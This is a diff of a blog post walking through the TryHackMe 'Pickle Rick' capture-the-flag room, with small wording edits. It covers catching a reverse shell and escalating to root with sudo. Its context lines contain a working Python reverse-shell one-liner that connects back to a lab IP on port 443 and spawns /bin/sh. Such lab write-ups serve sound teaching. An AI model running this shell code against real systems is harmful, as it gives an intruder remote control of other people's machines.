HSCTarou/hsctarou.github.io/_posts/2021-04-04-PickleRick-Writeup-TryHackMe.md

 python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.0.103",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 ```

-Now, we open a listener on port 443 with netcat and execute our command to get the shell.
+Now, we open a listener on port 443 with netcat and run our command to get the shell.

 ![Shell](/images/THM/PickleRick/34-first-shell.png){: .align-center}

 ## Privilege Escalation

 This is the easiest part, the first thing we could do is check the ```www-data``` user privileges with ```sudo -l```.
-We will find out that we can execute command as root without providing password.
+We will find out that we can execute commands as root without providing password.

-So we make ```sudo su``` to become root user.
+Running ```sudo su``` will make us root user.

 ![Privesc](/images/THM/PickleRick/37-privesc.png){: .align-center}

 The last thing would be locating the other two ingredients.
-If we check the  ```/home``` path we will see rick directory inside.
+If we check the  ```/home``` path we will see rick directory inside along with the second ingredient.

 ![Second Flag](/images/THM/PickleRick/35-second-ing.png){: .align-center}

 **Second Ingredient:** ```1 je*******```

-And the last ingredient could be found in the home directory for root or using the find command.
+And the last ingredient could be found in the home directory for root or using ```find```.

 ```bash
 find / -type f -name "*.txt" | grep -v "usr"